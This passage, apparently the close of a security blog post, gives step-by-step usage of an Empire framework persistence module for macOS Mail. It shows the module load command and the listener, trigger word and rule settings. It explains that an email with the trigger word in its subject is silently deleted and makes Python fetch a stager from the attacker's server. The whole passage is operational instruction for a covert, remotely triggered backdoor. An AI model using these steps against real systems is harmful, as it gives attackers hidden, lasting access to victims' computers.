  • usemodule persistence/osx/mail (or wherever you placed the module)
  • Specify Listener, Trigger Word, and RuleName
  • Execute

When you want to execute the payload at a later time all you have to do is:

  • Have your Empire server listening
  • Send an email to the target, specifying the trigger word in the subject line

The email will be deleted without ever reaching the inbox, and python will spawn a process that pulls down the stager from your Empire server.


-n00py